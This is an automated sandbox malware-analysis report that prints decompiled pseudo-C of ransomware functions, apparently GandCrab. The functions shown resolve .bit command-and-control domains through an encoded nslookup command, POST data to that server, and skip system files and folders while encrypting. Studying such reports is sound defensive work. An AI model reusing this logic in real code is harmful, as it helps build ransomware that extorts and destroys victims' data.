                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$ContextCrypt$Alloc$AcquireFree$AttributesErrorFileLastRelease$AddressCriticalEnterHandleLibraryLoadMessageModuleProcSectionlstrcatlstrcpy
                                    • String ID: $.$B$Fatal error$Fatal error: rsaenh.dll is not initialized as well$R
                                    • API String ID: 1177701972-4284454829
                                    • Opcode ID: ba6937b02cddb702b8e43c5499a0e281d256206ee54e1dec388b3160e899bcb7
                                    • Instruction ID: 8d669c6e364cd0e23f50fca449ac9c40ddfebeebdc1466eaf58607987c92b789
                                    • Opcode Fuzzy Hash: ba6937b02cddb702b8e43c5499a0e281d256206ee54e1dec388b3160e899bcb7
                                    • Instruction Fuzzy Hash: 49C19F71E40309BBEB119BA4DD81FEEBBB8FF48711F204125F640BA2C1DBB469568B54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F585060(CHAR* __ecx, void* __edx, WCHAR* _a4) {
                                    				struct _SECURITY_ATTRIBUTES _v16;
                                    				short _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				intOrPtr _v32;
                                    				intOrPtr _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				intOrPtr _v64;
                                    				intOrPtr _v68;
                                    				char _v72;
                                    				short _v76;
                                    				intOrPtr _v80;
                                    				intOrPtr _v84;
                                    				intOrPtr _v88;
                                    				intOrPtr _v92;
                                    				intOrPtr _v96;
                                    				intOrPtr _v100;
                                    				intOrPtr _v104;
                                    				intOrPtr _v108;
                                    				intOrPtr _v112;
                                    				intOrPtr _v116;
                                    				intOrPtr _v120;
                                    				intOrPtr _v124;
                                    				char _v128;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t43;
                                    				void* _t55;
                                    				CHAR* _t62;
                                    				void* _t64;
                                    
                                    				_v72 = 0x73006e;
                                    				_t55 = __edx;
                                    				_v20 = 0;
                                    				_t62 = __ecx;
                                    				_v76 = 0;
                                    				_v68 = 0x6f006c;
                                    				_t41 =  !=  ?  &_v128 :  &_v72;
                                    				_v64 = 0x6b006f;
                                    				_a4 =  !=  ?  &_v128 :  &_v72;
                                    				_v60 = 0x700075;
                                    				_v56 = 0x250020;
                                    				_v52 = 0x200053;
                                    				_v48 = 0x73006e;
                                    				_v44 = 0x2e0031;
                                    				_v40 = 0x690076;
                                    				_v36 = 0x6d0072;
                                    				_v32 = 0x630061;
                                    				_v28 = 0x2e0068;
                                    				_v24 = 0x750072;
                                    				_v128 = 0x73006e;
                                    				_v124 = 0x6f006c;
                                    				_v120 = 0x6b006f;
                                    				_v116 = 0x700075;
                                    				_v112 = 0x250020;
                                    				_v108 = 0x200053;
                                    				_v104 = 0x73006e;
                                    				_v100 = 0x2e0032;
                                    				_v96 = 0x690076;
                                    				_v92 = 0x6d0072;
                                    				_v88 = 0x630061;
                                    				_v84 = 0x2e0068;
                                    				_v80 = 0x750072;
                                    				_v16.nLength = 0xc;
                                    				_v16.bInheritHandle = 1;
                                    				_v16.lpSecurityDescriptor = 0;
                                    				_t43 = CreatePipe(0xf592a70, 0xf592a6c,  &_v16, 0);
                                    				if(_t43 != 0) {
                                    					_t43 = SetHandleInformation( *0xf592a70, 1, 0);
                                    					if(_t43 == 0) {
                                    						goto L1;
                                    					} else {
                                    						CreatePipe(0xf592a68, 0xf592a74,  &_v16, 0);
                                    						_t43 = SetHandleInformation( *0xf592a74, 1, 0);
                                    						if(_t43 == 0) {
                                    							goto L1;
                                    						} else {
                                    							_t64 = VirtualAlloc(0, 0x2800, 0x3000, 4);
                                    							if(_t64 == 0) {
                                    								lstrcpyA(_t62, "fabian wosar <3");
                                    								return 0;
                                    							} else {
                                    								wsprintfW(_t64, _a4, _t55);
                                    								E0F584E10(_t64);
                                    								E0F584FB0(_t55, _t62, _t55, _t62, _t64);
                                    								VirtualFree(_t64, 0, 0x8000);
                                    								return 0;
                                    							}
                                    						}
                                    					}
                                    				} else {
                                    					L1:
                                    					return _t43 | 0xffffffff;
                                    				}
                                    			}







































                                    0x0f58506d
                                    0x0f585078
                                    0x0f58507b
                                    0x0f58507f
                                    0x0f585081
                                    0x0f58508b
                                    0x0f585092
                                    0x0f585095
                                    0x0f58509e
                                    0x0f5850af
                                    0x0f5850b6
                                    0x0f5850bd
                                    0x0f5850c4
                                    0x0f5850cb
                                    0x0f5850d2
                                    0x0f5850d9
                                    0x0f5850e0
                                    0x0f5850e7
                                    0x0f5850ee
                                    0x0f5850f5
                                    0x0f5850fc
                                    0x0f585103
                                    0x0f58510a
                                    0x0f585111
                                    0x0f585118
                                    0x0f58511f
                                    0x0f585126
                                    0x0f58512d
                                    0x0f585134
                                    0x0f58513b
                                    0x0f585142
                                    0x0f585149
                                    0x0f585150
                                    0x0f585157
                                    0x0f58515e
                                    0x0f585165
                                    0x0f58516d
                                    0x0f585189
                                    0x0f58518d
                                    0x00000000
                                    0x0f58518f
                                    0x0f58519f
                                    0x0f5851af
                                    0x0f5851b3
                                    0x00000000
                                    0x0f5851b5
                                    0x0f5851c9
                                    0x0f5851cd
                                    0x0f58520a
                                    0x0f585218
                                    0x0f5851cf
                                    0x0f5851d4
                                    0x0f5851df
                                    0x0f5851e8
                                    0x0f5851f5
                                    0x0f585203
                                    0x0f585203
                                    0x0f5851cd
                                    0x0f5851b3
                                    0x0f58516f
                                    0x0f58516f
                                    0x0f585178
                                    0x0f585178

                                    APIs
                                    • CreatePipe.KERNEL32(0F592A70,0F592A6C,?,00000000,00000001,00000001,00000000), ref: 0F585165
                                    • SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F585189
                                    • CreatePipe.KERNEL32(0F592A68,0F592A74,0000000C,00000000), ref: 0F58519F
                                    • SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F5851AF
                                    • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 0F5851C3
                                    • wsprintfW.USER32 ref: 0F5851D4
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F5851F5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
                                    • String ID: $ $1$2$S$S$a$a$fabian wosar <3$h$h$l$l$n$n$n$n$o$o$r$r$r$r$u$u$v$v
                                    • API String ID: 1490407255-3072057902
                                    • Opcode ID: 315b0cbed8d65d982c82a46fd35c39bbff48465a2df2d78d32241635c60fe22e
                                    • Instruction ID: 8da1a7b584a6d7daf77cc5e32a920ffe955128b43e4ad9c8c8c528cfe2bfa8c4
                                    • Opcode Fuzzy Hash: 315b0cbed8d65d982c82a46fd35c39bbff48465a2df2d78d32241635c60fe22e
                                    • Instruction Fuzzy Hash: A2415C71E40308ABEB109F94DD487EDBFB6FB04759F104129E904BA281D7FA455A8F94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 93%
                                    			E0F5868F0(WCHAR* __ecx) {
                                    				int _t4;
                                    				signed int _t5;
                                    				signed int _t15;
                                    				void* _t19;
                                    				WCHAR* _t21;
                                    				short* _t25;
                                    				WCHAR* _t26;
                                    
                                    				_t21 = __ecx;
                                    				_t4 = lstrlenW(__ecx);
                                    				_t5 = lstrlenW(_t21);
                                    				_t1 = _t21 - 2; // -2
                                    				_t25 = _t1 + _t5 * 2;
                                    				_t19 = _t4 - 1;
                                    				if(_t19 != 0) {
                                    					do {
                                    						_t25 = _t25 - 2;
                                    						_t19 = _t19 - 1;
                                    					} while ( *_t25 != 0x5c && _t19 != 0);
                                    				}
                                    				_t26 = _t25 + 2;
                                    				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
                                    					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
                                    						goto L5;
                                    					} else {
                                    						_t15 = lstrcmpiW(_t26, L"CRAB-DECRYPT.txt");
                                    						asm("sbb eax, eax");
                                    						return  ~_t15 + 1;
                                    					}
                                    				} else {
                                    					L5:
                                    					return 1;
                                    				}
                                    			}










                                    0x0f5868f9
                                    0x0f5868fc
                                    0x0f586901
                                    0x0f586903
                                    0x0f586906
                                    0x0f586909
                                    0x0f58690a
                                    0x0f586910
                                    0x0f586910
                                    0x0f586913
                                    0x0f586914
                                    0x0f586910
                                    0x0f586924
                                    0x0f586931
                                    0x0f586946
                                    0x00000000
                                    0x0f586990
                                    0x0f586996
                                    0x0f58699b
                                    0x0f5869a0
                                    0x0f5869a0
                                    0x0f586935
                                    0x0f586935
                                    0x0f58693b
                                    0x0f58693b

                                    APIs
                                    • lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,0F586B03), ref: 0F5868FC
                                    • lstrlenW.KERNEL32(00000000), ref: 0F586901
                                    • lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0F58692D
                                    • lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 0F586942
                                    • lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0F58694E
                                    • lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 0F58695A
                                    • lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 0F586966
                                    • lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 0F586972
                                    • lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 0F58697E
                                    • lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 0F58698A
                                    • lstrcmpiW.KERNEL32(-00000004,CRAB-DECRYPT.txt), ref: 0F586996
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcmpi$lstrlen
                                    • String ID: i)w$CRAB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
                                    • API String ID: 203586893-739155506
                                    • Opcode ID: 3b1154fdaae42e0514b1dc947d1580bd14000208d25efafdcf74f00b8058e6b7
                                    • Instruction ID: cd6451f024e767dec442da0242c67cd43a98bdaaad60d562859ccd19e01c8704
                                    • Opcode Fuzzy Hash: 3b1154fdaae42e0514b1dc947d1580bd14000208d25efafdcf74f00b8058e6b7
                                    • Instruction Fuzzy Hash: DB11CE627806A6755B20367DAD01EEF13CCBDD6F90385023AF904F2083EB99EE1384B5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 19%
                                    			E0F586780(void* __ecx) {
                                    				void* _t12;
                                    				intOrPtr* _t23;
                                    				void* _t51;
                                    				void* _t52;
                                    
                                    				_t52 = __ecx;
                                    				_t51 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
                                    				if(E0F5881F0(_t52, L"\\ProgramData\\") != 0 || E0F5881F0(_t52, L"\\IETldCache\\") != 0 || E0F5881F0(_t52, L"\\Boot\\") != 0 || E0F5881F0(_t52, L"\\Program Files\\") != 0 || E0F5881F0(_t52, L"\\Tor Browser\\") != 0 || E0F5881F0(_t52, L"Ransomware") != 0 || E0F5881F0(_t52, L"\\All Users\\") != 0 || E0F5881F0(_t52, L"\\Local Settings\\") != 0) {
                                    					L18:
                                    					VirtualFree(_t51, 0, 0x8000);
                                    					return 0;
                                    				} else {
                                    					_t12 = E0F5881F0(_t52, L"\\Windows\\");
                                    					if(_t12 != 0) {
                                    						goto L18;
                                    					} else {
                                    						_t23 = __imp__SHGetSpecialFolderPathW;
                                    						_push(_t12);
                                    						_push(0x2a);
                                    						_push(_t51);
                                    						_push(_t12);
                                    						if( *_t23() == 0 || E0F5881F0(_t52, _t51) == 0) {
                                    							_push(0);
                                    							_push(0x2b);
                                    							_push(_t51);
                                    							_push(0);
                                    							if( *_t23() == 0 || E0F5881F0(_t52, _t51) == 0) {
                                    								_push(0);
                                    								_push(0x24);
                                    								_push(_t51);
                                    								_push(0);
                                    								if( *_t23() == 0 || E0F5881F0(_t52, _t51) == 0) {
                                    									_push(0);
                                    									_push(0x1c);
                                    									_push(_t51);
                                    									_push(0);
                                    									if( *_t23() == 0 || E0F5881F0(_t52, _t51) == 0) {
                                    										VirtualFree(_t51, 0, 0x8000);
                                    										return 1;
                                    									} else {
                                    										goto L18;
                                    									}
                                    								} else {
                                    									goto L18;
                                    								}
                                    							} else {
                                    								goto L18;
                                    							}
                                    						} else {
                                    							goto L18;
                                    						}
                                    					}
                                    				}
                                    			}







                                    0x0f586791
                                    0x0f5867a0
                                    0x0f5867a9
                                    0x0f5868d4
                                    0x0f5868dd
                                    0x0f5868e8
                                    0x0f58683b
                                    0x0f586842
                                    0x0f586849
                                    0x00000000
                                    0x0f58684f
                                    0x0f58684f
                                    0x0f586855
                                    0x0f586856
                                    0x0f586858
                                    0x0f586859
                                    0x0f58685e
                                    0x0f58686d
                                    0x0f58686f
                                    0x0f586871
                                    0x0f586872
                                    0x0f586878
                                    0x0f586887
                                    0x0f586889
                                    0x0f58688b
                                    0x0f58688c
                                    0x0f586892
                                    0x0f5868a1
                                    0x0f5868a3
                                    0x0f5868a5
                                    0x0f5868a6
                                    0x0f5868ac
                                    0x0f5868c8
                                    0x0f5868d3
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f58685e
                                    0x0f586849

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F586E06,00000000,?,?), ref: 0F586793
                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F586E06,00000000,?,?), ref: 0F58685A
                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F586E06,00000000,?,?), ref: 0F586874
                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F586E06,00000000,?,?), ref: 0F58688E
                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F586E06,00000000,?,?), ref: 0F5868A8
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F586E06,00000000,?,?), ref: 0F5868C8
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F586E06,00000000,?,?), ref: 0F5868DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FolderPathSpecial$Virtual$Free$Alloc
                                    • String ID: Ransomware$\All Users\$\Boot\$\IETldCache\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\$\Windows\
                                    • API String ID: 1363212851-3735464813
                                    • Opcode ID: 12619a8fe19732222dd493198db7ad9a0c3e6e1636b14e5343d4320dd0b6aeef
                                    • Instruction ID: 39386b1874398073fcb3d2cddaedfcb22535d72e04910fdab950d4ea3d1c13d8
                                    • Opcode Fuzzy Hash: 12619a8fe19732222dd493198db7ad9a0c3e6e1636b14e5343d4320dd0b6aeef
                                    • Instruction Fuzzy Hash: 1531E12074076222EA6432660D55B2F4BDAABD9E56F914035AA05FF2C2EF58DC0387A9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 86%
                                    			E0F585220() {
                                    				WCHAR* _v8;
                                    				intOrPtr _v12;
                                    				char _v16;
                                    				intOrPtr _v20;
                                    				char _v24;
                                    				char* _v28;
                                    				char* _v32;
                                    				char* _v36;
                                    				short _v40;
                                    				char _v56;
                                    				short _v60;
                                    				intOrPtr _v64;
                                    				char _v80;
                                    				WCHAR* _t26;
                                    				intOrPtr _t27;
                                    				long _t32;
                                    				WCHAR* _t37;
                                    				void* _t39;
                                    				signed int _t40;
                                    				signed int _t41;
                                    				signed int _t45;
                                    				void* _t48;
                                    				WCHAR* _t49;
                                    				void* _t52;
                                    				void* _t53;
                                    
                                    				asm("movdqa xmm0, [0xf590540]");
                                    				_v36 =  &_v56;
                                    				asm("movdqu [ebp-0x34], xmm0");
                                    				_v32 =  &_v80;
                                    				asm("movdqa xmm0, [0xf590520]");
                                    				_v40 = 0x74;
                                    				asm("movdqu [ebp-0x4c], xmm0");
                                    				_v64 = 0x69622e6d;
                                    				_v60 = 0x74;
                                    				_v24 = 0x62636467;
                                    				_v20 = 0x7469622e;
                                    				_v16 = 0;
                                    				_v28 =  &_v24;
                                    				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
                                    				_t37 = _t26;
                                    				_v8 = _t37;
                                    				if(_t37 != 0) {
                                    					_t40 = 0;
                                    					_t48 = 1;
                                    					_t45 = 0;
                                    					while(1) {
                                    						_t27 =  *((intOrPtr*)(_t52 + _t45 * 4 - 0x20));
                                    						_t45 = _t45 + 1;
                                    						_v12 = _t27;
                                    						if(_t45 == 3) {
                                    							asm("sbb esi, esi");
                                    							_t48 =  ~(_t48 - 1) + 2;
                                    							_t45 = 0;
                                    						}
                                    						if(_t40 == 0xffffffff) {
                                    							Sleep(0x3e8);
                                    						}
                                    						_t39 = VirtualAlloc(0, 2 + lstrlenW(_t37) * 2, 0x3000, 4);
                                    						_t41 = _t39;
                                    						E0F585060(_t41, _v12, _t48);
                                    						_t53 = _t53 + 4;
                                    						_t32 = lstrcmpiA(_t39, "fabian wosar <3");
                                    						if(_t32 != 0) {
                                    							break;
                                    						}
                                    						VirtualFree(_t39, _t32, 0x8000);
                                    						_t37 = _v8;
                                    						_t40 = _t41 | 0xffffffff;
                                    					}
                                    					_t49 = _v8;
                                    					wsprintfW(_t49, L"%S", _t39);
                                    					VirtualFree(_t39, 0, 0x8000);
                                    					_t26 = _t49;
                                    				}
                                    				return _t26;
                                    			}




























                                    0x0f585226
                                    0x0f585236
                                    0x0f585241
                                    0x0f585246
                                    0x0f58524c
                                    0x0f58525b
                                    0x0f585261
                                    0x0f585266
                                    0x0f58526d
                                    0x0f585273
                                    0x0f58527a
                                    0x0f585281
                                    0x0f585285
                                    0x0f585288
                                    0x0f58528e
                                    0x0f585290
                                    0x0f585295
                                    0x0f58529b
                                    0x0f58529d
                                    0x0f5852a2
                                    0x0f5852a4
                                    0x0f5852a4
                                    0x0f5852a8
                                    0x0f5852a9
                                    0x0f5852af
                                    0x0f5852b4
                                    0x0f5852b6
                                    0x0f5852b9
                                    0x0f5852b9
                                    0x0f5852be
                                    0x0f5852c5
                                    0x0f5852c5
                                    0x0f5852ec
                                    0x0f5852ef
                                    0x0f5852f1
                                    0x0f5852f6
                                    0x0f5852ff
                                    0x0f585307
                                    0x00000000
                                    0x00000000
                                    0x0f585310
                                    0x0f585316
                                    0x0f585319
                                    0x0f585319
                                    0x0f58531e
                                    0x0f585328
                                    0x0f585339
                                    0x0f58533f
                                    0x0f58533f
                                    0x0f585347

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0F585288
                                    • Sleep.KERNEL32(000003E8), ref: 0F5852C5
                                    • lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F5852D3
                                    • VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F5852E3
                                    • lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F5852FF
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F585310
                                    • wsprintfW.USER32 ref: 0F585328
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F585339
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
                                    • String ID: .bit$fabian wosar <3$gdcb$m.bi$t$t
                                    • API String ID: 2709691373-2847225850
                                    • Opcode ID: d1825d586f8624f3901625524a622172895362234e77ec1b0802ca379dd5396a
                                    • Instruction ID: a837bf1f86855d84c932208a36c83e99dd261ff7a176a6722088736031e62322
                                    • Opcode Fuzzy Hash: d1825d586f8624f3901625524a622172895362234e77ec1b0802ca379dd5396a
                                    • Instruction Fuzzy Hash: E431EB71E00309E7DB00DFA4DD85BEE7BB8FF44721F101125F605B6281EB745A068B94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 22%
                                    			E0F5854F0(CHAR* __ecx, CHAR** __edx, intOrPtr _a8) {
                                    				void* _v8;
                                    				CHAR* _v12;
                                    				void* _v16;
                                    				CHAR** _v20;
                                    				void* _v24;
                                    				char _v28;
                                    				short _v124;
                                    				void* _t40;
                                    				CHAR* _t44;
                                    				CHAR* _t46;
                                    				void* _t47;
                                    				void* _t55;
                                    				void* _t56;
                                    				CHAR* _t58;
                                    				void* _t59;
                                    
                                    				_t46 = __ecx;
                                    				_v20 = __edx;
                                    				_v12 = __ecx;
                                    				E0F587E40( &_v28);
                                    				_v16 = E0F585220();
                                    				_t55 = 0x400 + lstrlenA(_t46) * 2;
                                    				_t7 = _t55 + 1; // 0x1
                                    				_t47 = VirtualAlloc(0, _t7, 0x3000, 0x40);
                                    				_v8 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
                                    				if(_t47 == 0) {
                                    					L3:
                                    					_t58 = 0;
                                    					L4:
                                    					lstrcatA(_t58, _v12);
                                    					asm("movdqu xmm0, [0xf58fb40]");
                                    					asm("movdqu [ebp-0x78], xmm0");
                                    					asm("movdqu xmm0, [0xf58fb50]");
                                    					asm("movdqu [ebp-0x68], xmm0");
                                    					asm("movdqu xmm0, [0xf58fb60]");
                                    					asm("movdqu [ebp-0x58], xmm0");
                                    					asm("movdqu xmm0, [0xf58fb70]");
                                    					asm("movdqu [ebp-0x48], xmm0");
                                    					asm("movdqu xmm0, [0xf58fb80]");
                                    					asm("movdqu [ebp-0x38], xmm0");
                                    					asm("movdqu xmm0, [0xf58fb90]");
                                    					asm("movdqu [ebp-0x28], xmm0");
                                    					lstrlenA(_t58);
                                    					_t56 = 0;
                                    					_push(lstrlenW( &_v124));
                                    					_push( &_v124);
                                    					_push(L"POST");
                                    					_push(0x31fff);
                                    					_push(_v8);
                                    					_push(lstrlenA(_t58));
                                    					_push(_t58);
                                    					_t59 = _v16;
                                    					_push(L"popkadurak");
                                    					_push(_t59);
                                    					if(E0F588050( &_v28) != 0) {
                                    						_t56 = 1;
                                    						if(_a8 != 0) {
                                    							_v12 = 0;
                                    							if(E0F5853D0(_v8,  &_v12) == 0) {
                                    								_t56 = 0;
                                    							} else {
                                    								_t44 = _v12;
                                    								if(_t44 != 0) {
                                    									 *_v20 = _t44;
                                    								}
                                    							}
                                    						}
                                    					}
                                    					VirtualFree(_t59, 0, 0x8000);
                                    					VirtualFree(_v8, 0, 0x8000);
                                    					VirtualFree(_t47, 0, 0x8000);
                                    					_t40 = _v24;
                                    					if(_t40 != 0) {
                                    						InternetCloseHandle(_t40);
                                    					}
                                    					return _t56;
                                    				}
                                    				_t9 = _t55 + 1; // 0x1
                                    				if(_t55 >= _t9) {
                                    					goto L3;
                                    				} else {
                                    					_t58 = _t47;
                                    					goto L4;
                                    				}
                                    			}


















                                    0x0f5854f8
                                    0x0f5854fa
                                    0x0f585501
                                    0x0f585504
                                    0x0f58550f
                                    0x0f585525
                                    0x0f58552c
                                    0x0f585542
                                    0x0f585546
                                    0x0f58554b
                                    0x0f585558
                                    0x0f585558
                                    0x0f58555a
                                    0x0f58555e
                                    0x0f585564
                                    0x0f58556d
                                    0x0f585572
                                    0x0f58557a
                                    0x0f58557f
                                    0x0f585587
                                    0x0f58558c
                                    0x0f585594
                                    0x0f585599
                                    0x0f5855a1
                                    0x0f5855a6
                                    0x0f5855ae
                                    0x0f5855b3
                                    0x0f5855bc
                                    0x0f5855c5
                                    0x0f5855c9
                                    0x0f5855ca
                                    0x0f5855d2
                                    0x0f5855d7
                                    0x0f5855e1
                                    0x0f5855e2
                                    0x0f5855e3
                                    0x0f5855e9
                                    0x0f5855ee
                                    0x0f5855f6
                                    0x0f5855fc
                                    0x0f585601
                                    0x0f585609
                                    0x0f585617
                                    0x0f585627
                                    0x0f585619
                                    0x0f585619
                                    0x0f58561e
                                    0x0f585623
                                    0x0f585623
                                    0x0f58561e
                                    0x0f585617
                                    0x0f585601
                                    0x0f585637
                                    0x0f585643
                                    0x0f58564d
                                    0x0f58564f
                                    0x0f585654
                                    0x0f585657
                                    0x0f585657
                                    0x0f585665
                                    0x0f585665
                                    0x0f58554d
                                    0x0f585552
                                    0x00000000
                                    0x0f585554
                                    0x0f585554
                                    0x00000000
                                    0x0f585554

                                    APIs
                                      • Part of subcall function 0F587E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F588024
                                      • Part of subcall function 0F587E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F58803D
                                      • Part of subcall function 0F585220: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0F585288
                                      • Part of subcall function 0F585220: Sleep.KERNEL32(000003E8), ref: 0F5852C5
                                      • Part of subcall function 0F585220: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F5852D3
                                      • Part of subcall function 0F585220: VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F5852E3
                                      • Part of subcall function 0F585220: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F5852FF
                                      • Part of subcall function 0F585220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F585310
                                      • Part of subcall function 0F585220: wsprintfW.USER32 ref: 0F585328
                                      • Part of subcall function 0F585220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F585339
                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,77296980), ref: 0F585512
                                    • VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F585532
                                    • VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0F585544
                                    • lstrcatA.KERNEL32(00000000,?), ref: 0F58555E
                                    • lstrlenA.KERNEL32(00000000), ref: 0F5855B3
                                    • lstrlenW.KERNEL32(?), ref: 0F5855BF
                                    • lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0F5855DB
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F585637
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F585643
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F58564D
